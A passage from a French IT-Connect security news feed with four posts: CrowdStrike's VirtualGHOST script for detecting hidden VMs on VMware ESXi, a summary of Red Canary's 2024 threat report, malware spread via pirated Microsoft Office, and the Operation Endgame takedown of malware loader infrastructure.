Cet outil, disponible sur GitHub, s'appuie sur un script PowerShell nommé "Detect-VirtualGHOST.ps1" qui compare la liste des machines virtuelles enregistrées dans l'inventaire avec celles qui sont effectivement allumées. Ceci permet d'identifier les machines en cours d'exécution, mais non enregistrée sur l'hôte. Lorsqu'une VM suspecte est détectée, l'outil collecte des informations supplémentaires à son sujet, notamment la configuration réseau.

Ce script s'utilise depuis un poste de travail ou un serveur distant et nécessite la présence du module VMware PowerCLI, ce dernier permettant d'exécuter des commandes "esxcli" et donc de vérifier l'état des machines virtuelles.

Remarque : pour fonctionner, le script Detect-VirtualGHOST.ps1 attend deux informations. Le nom DNS du serveur à analyser ou son adresse IP, ainsi que des identifiants pour s'authentifier sur l'API de management VMware.

Voici un exemple de sortie mettant en évidence la présence d'une VM cachée :

Cet outil a été testé par CrowdStrike sur VMware vCenter 8.0.2, ainsi que plusieurs versions de VMware ESXi (6.5.0, 7.0.3, 8.0.0).

Pour plus de détails, vous pouvez consulter le dépôt GitHub de CrowdStrike :

• GitHub - VirtualGHOST

Compte tenu des nombreuses menaces capables de compromettre les hyperviseurs VMware ESXi, il peut s'avérer judicieux d'exécuter cet outil pour analyser son infrastructure.

Source

The post VirtualGHOST : détectez les machines virtuelles cachées par les attaquants sur VMware ESXi first appeared on IT-Connect.

Le "Red Canary’s 2024 Threat Detection Report" offre une analyse exhaustive des cybermenaces actuelles, détaillant les principales techniques d'attaque et fournissant des recommandations cruciales pour renforcer la cybersécurité des entreprises et des États. Qu'en est-il en 2024 ?

Qu'est-ce que le rapport de Red Canary ?

Le Red Canary’s 2024 Threat Detection Report est un rapport biannuel produit par la société de cybersécurité américaine Red Canary. Il vise à détailler les tendances des menaces pesant sur les entreprises et les États. Ce rapport se base sur plus de 60 000 détections obtenues auprès de plus de 1 000 clients de la société, couvrant des endpoints, des infrastructures cloud, des équipements réseau, des applications SaaS, et plus encore.

Ce rapport de 160 pages détaille les tendances des menaces observées sur le terrain durant la première moitié de l'année 2024.

• Qu'est-ce que cela signifie ?

Grâce à sa présence dans de nombreux systèmes d'information, Red Canary est en mesure de capter un grand nombre d'événements de sécurité. Cela permet de dessiner des tendances sur les principales techniques utilisées par les attaquants, les impacts observés lors des cyberattaques, ainsi que les objectifs visés.

• À quoi peut me servir ce rapport ?

En lisant ce rapport, avec ses détails techniques et ses conclusions, vous pourrez mieux comprendre les techniques utilisées par les attaquants, le profil de leurs victimes et l'évolution de ces différents éléments dans le temps. En connaissant les menaces qui pèsent sur votre entreprise, vous pourrez anticiper et adapter vos projets de cybersécurité actuels et futurs pour mieux vous défendre contre ces menaces.

Les conclusions de ce rapport peuvent, par exemple, servir à améliorer les systèmes de détection d'intrusion de votre SOC, amener à la réalisation d'audit de sécurité sur des composants spécifiquement ciblés par les attaquants cette année ou simplement améliorer les connaissances de vos équipes de défense.

Intéressons-nous maintenant aux différentes conclusions de ce rapport.

Les tendances des cyberattaques en 2024

Red Canary a effectué une analyse des principales tendances rencontrées lors de cyberattaques confirmées et rapports threat intelligence (renseignement sur la menace) au cours de la dernière année.

Sans surprise, la tendance principale des cyberattaques observées durant ces derniers mois fait apparaitre les ransomwares en haut du classement. Ce business visiblement lucratif a la vie dure et continue année après année à impacter lourdement les entreprises qui en sont victimes.

Les attaques sur les accès initiaux, c'est-à-dire visant à obtenir un premier accès au sein du système d'information d'une entreprise pour ensuite implanter un agent dormant et vendre l'accès au plus intéressé, est également un élément qui demeure très présent dans les observations de 2024. Suivi de près par les attaques ciblant le vol d'identifiants, dont l'impact est d'autant plus grand grâce (ou à cause) de l'implémentation du SSO (Single Sign On).

Parmi les autres tendances observées en 2024, on peut également noter :

• L'exploitation de CVE (vulnérabilités publiques) sur des composants non à jour
• Le déploiement de stealer, des malwares spécialisés dans la récolte de données sur le système sur lequel ils sont installés, comme les mots de passe dans les navigateurs ou les coffres-fort de mots de passe. On peut notamment citer les malwares RedLine, Vidar et LummaC2.
• L'utilisation d'outils d'administration à distance légitimes comme Atera ou Remco
• L'utilisation de tokens (jeton d'authentification) API volés sur les infrastructures cloud : les tokens apparaissent de plus en plus comme des alternatives à durée de vie temporaire à la saisie fréquentes des mots de passe, il faut être conscient que le vol de ceux-ci permet d'usurper l'identité du propriétaire.
• L'intelligence artificielle générative, qui fait son apparition depuis quelque temps dans les médias, mais aussi chez les cyberattaquant. Cela particulièrement afin de construire des outils et campagnes de phishing très crédibles, mais aussi pour concevoir de nouveaux malwares rapidement.
• La société observée également qu'un quart des détections réalisées sont en fait dues à des opérations de test "légitimes", tel que du bug bounty, des tests d'intrusion ou des opérations red team.

Enfin, il est par ailleurs intéressant de constater que le secteur d'activité n'est plus vraiment un facteur d'augmentation ou de réduction du risque de cyberattaque. Autrement dit, les attaquants ne cherchent plus à cibler un type d'industrie spécifique ou à en éviter d'autres (comme les écoles et les hôpitaux par le passé). À présent, tout le monde est en risque de devenir la cible d'une cyberattaque.

Les principales menaces observées en 2024

Les observations faites par Red Canary sur la fin de 2023 et début 2024 permettent d'identifier les principaux outils utilisés par les cyberattaquants :

La menace qui se démarque le plus, au-dessus de l'utilisation d'outils classiques d'attaque comment impacket et mimikatz, est CharCoal Stork.

Charcoal Stork est un fournisseur de pay-per-install (PPI) qui utilise le malvertising pour distribuer des installateurs, souvent déguisés en jeux piratés, polices ou fonds d'écran. Initialement, Charcoal Stork utilisait des fichiers ISO avec des charges utiles comprenant une application basée sur NodeJS et des commandes PowerShell pour installer ChromeLoader. En 2023, les charges utiles ont évolué pour inclure des fichiers VBS, MSI et EXE.

SmashJacker, par exemple, installe une version piégée de 7-zip qui installe une extension malveillante sur le navigateur. En août 2023, Charcoal Stork a livré des fichiers EXE menant à des logiciels malveillants plus préoccupants comme VileRAT, un RAT (Remote Administration Tool) Python utilisé par DeathStalker.

Si vous souhaitez en savoir plus, notamment afin de détecter la présence de cet élément malveillant dans votre système d'information. Je vous invite à consulter la page dédiée à Charcoal Stork sur le site web de Red Canary.

• Red Canary - Threat Charcoal Stork

Vous y trouverez des informations permettant d'identifier des éléments signatures (hash, lignes de commande, nom de fichiers) pouvant trahir sa présence.

Les principales techniques (TTP) des attaquants en 2024

La dernière section du document permet de lister les principales techniques d'attaque observées depuis fin 2023/début 2024. Ces techniques sont identifiées selon les TTP du framework d'attaque du MITRE : ATT&CK

Les techniques ciblant les systèmes d'exploitation Windows sont bien sûr en tête de liste, cela est en lien direct avec le fait qu'il s'agit d système le plus utilisé pour les postes utilisateur. On y retrouve donc les TTP liés à l'exécution de commande batch et PowerShell (présent dans 22.1% des cyberattaques observées !) ainsi que WMI (Windows Management Instrumentation).

Il est à noter la montée fulgurante du TTP Cloud Account, qui passe de la 46ᵉ place en 2022 à la 4ᵉ aujourd'hui. Cette technique (T1078.004 - Cloud Accounts) vise à utiliser des identifiants volés d'environnement Cloud pour réaliser un premier accès à une cible, mais aussi de la persistance, de l'élévation de privilège ou de l'évasion de défense.

Conclusion

Le Red Canary’s 2024 Threat Detection Report nous offre une analyse détaillée des tendances actuelles en matière de cybersécurité. Les données recueillies donnent des informations très importantes pour mieux protéger votre système d'information et votre entreprise.

Je vous recommande sa lecture (un peu longue certes, mais très instructive), si vous voulez avoir plus de détails et comprendre en profondeur les principales tendances des menaces en 2024 :

• Red Canary - 2024 Threat Detection Report

The post Quelles tendances des menaces en 2024 ? Réponse avec le rapport Red Canary ! first appeared on IT-Connect.

Des versions piratées de la suite Microsoft Office diffusées via sites de torrents sont utilisées par les cybercriminels pour diffuser plusieurs logiciels malveillants : Cheval de Troie d'accès à distance, mineur de cryptomonnaie, etc... ! Faisons le point.

Une nouvelle campagne malveillante identifiée par le Security Intelligence Center d'AhnLab (ASEC) alerte sur les dangers du téléchargement de logiciels piratés. Malheureusement, ce n'est pas une évidence pour tout le monde et les adeptes de téléchargements illégaux restent très nombreux dans le monde entier. Les cybercriminels l'ont bien compris... Et, ils exploitent des versions piratées de Microsoft Office diffusées sur des sites de torrents pour distribuer un ensemble de malwares.

Les utilisateurs qui téléchargent et installent ces versions piratées de Microsoft Office se retrouvent infectés par divers types de logiciels malveillants, notamment des chevaux de Troie d'accès à distance (RATs), des mineurs de cryptomonnaie, etc.

Un programme d'installation trompeur !

Le programme de la version piratée de Microsoft Office présente une interface bien conçue, et plutôt trompeuse pour les utilisateurs. Nous pourrions même dire qu'elle est plutôt rassurante, car elle permet aux utilisateurs de choisir la version, la langue et la variante (32 ou 64 bits) qu'ils souhaitent installer.

Voici un aperçu :

Cependant, ce n'est que la face visible de ce programme d'installation. En effet, pendant ce temps, en arrière-plan, il lance un malware qui se connecte à un canal Telegram ou Mastodon, à partir duquel il pourra obtenir un lien menant vers Google Drive ou GitHub pour télécharger des logiciels malveillants. Ces services légitimes présentes l'avantage de ne pas alerter les solutions de sécurité.

Des charges utiles dangereuses...

Lors de leurs analyses, les chercheurs Coréens sont parvenus un ensemble de malwares, dont voici la liste :

• Orcus RAT : permet un contrôle à distance complet, incluant la capture des frappes au clavier, l'accès à la webcam de l'ordinateur, la possibilité de prendre des captures d'écran ou encore d'exfiltrer des données.
• XMRig : un mineur de cryptomonnaie utilisant les ressources du système pour miner du Monero. Pour éviter d'être détecté, le minage est arrêté lorsque l'utilisateur sollicite de façon intensive les ressources de la machine.
• 3Proxy : convertit les systèmes infectés en serveurs proxy, permettant aux attaquants de router du trafic malveillant, par l'intermédiaire du port 3306.
• PureCrypter : télécharge et exécute des charges malveillantes supplémentaires à partir de sources externes.
• AntiAV : désactive ou reconfigure les logiciels de sécurité en place sur la machine infectée, de façon à diminuer son niveau de sécurité et à la rendre vulnérable aux autres menaces.

Persistance des logiciels malveillants

Même si l'utilisateur découvre et supprime certains de ces malwares, le module "Updater", exécuté au démarrage du système, les réintroduit. Bien entendu, à l'occasion de la publication de cette étude, les chercheurs d'ASEC mettent en garde les utilisateurs contre les risques de téléchargement de logiciels depuis des sources non officielles et illégales, dans le but d'obtenir des logiciels piratés. Autant que possible, pensez également à vérifier l'intégrité de vos images ISO et autres sources.

Microsoft Office étant un exemple parmi tant d'autres... En effet, des campagnes similaires ont été utilisées pour propager le ransomware STOP.

Source

The post Des versions piratées de Microsoft Office utilisées pour distribuer un ensemble de malwares ! first appeared on IT-Connect.

Un nouveau coup de filet majeur contre les cybercriminels : les autorités internationales sont parvenues à démanteler des infrastructures associées à plusieurs logiciels malveillants. Nom de l'opération ENDGAME. Voici ce que l'on sait.

Le 30 mai 2024, une vaste opération de démantèlement de plusieurs infrastructures cybercriminelles a été menée avec succès dans le cadre d’une coopération judiciaire internationale baptisée "ENDGAME". Il s'agit d'une opération indépendante de l'opération Cronos menée contre le gang LockBit : preuve que les autorités travaillent ardemment pour lutter contre la cybercriminalité.

Cette opération coordonnée a été menée par des autorités de plusieurs pays, notamment la France, l'Allemagne, les Pays-Bas, le Danemark, le Royaume-Uni et les États-Unis. La coordination globale a été assurée par Europol, qui a d'ailleurs publié un rapport à ce sujet.

En France, cette initiative a été menée par la section J3 de lutte contre la Cybercriminalité du Parquet de Paris en collaboration avec l’Office anti-cybercriminalité (OFAC). Par ailleurs, l'Agence nationale de la sécurité des systèmes d'information (ANSSI) a contribué à l'opération ENDGAME en participant à l’identification et à la notification des victimes.

L'opération visait spécifiquement à neutraliser des serveurs rattachés aux infrastructures utilisées par les cybercriminels. Résultat, les forces de l'ordre sont parvenues à saisir une centaine de serveurs et plus de 2 000 noms de domaines ! Les serveurs en question sont répartis dans différents pays : Bulgarie, Canada, Allemagne, Lituanie, Pays-Bas, Roumanie, Suisse, Royaume-Uni, États-Unis et Ukraine.

"Les opérations menées par les forces de l’ordre se sont déployées sur plusieurs pays et ont mené à l’interpellation de 4 personnes dont 3 par les autorités françaises, à 16 perquisitions.", peut-on lire dans un post LinkedIn publié par le Parquet de Paris.

L'objectif était de cibler les infrastructures utilisées dans le fonctionnement de différents loaders : BumbleBee, IcedID, Smokeloader, Pikabot, Trickbot et SystemBCt. Ces logiciels malveillants sont généralement distribués via des campagnes de phishing. Une fois qu'une machine est infectée, ce code malveillant est utilisé pour télécharger et déployer d'autres malwares, dont des ransomwares.

Le Parquet de Paris précise que "L’administrateur du botnet Pikabot a été interpellé en Ukraine avec le concours des autorités ukrainiennes, l’un des acteurs principaux du dropper « Bumblebee » a été auditionné en Arménie."

Bravo aux forces de l'ordre !

The post Opération Endgame – Une action internationale contre les cybercriminels et les logiciels malveillants first appeared on IT-Connect.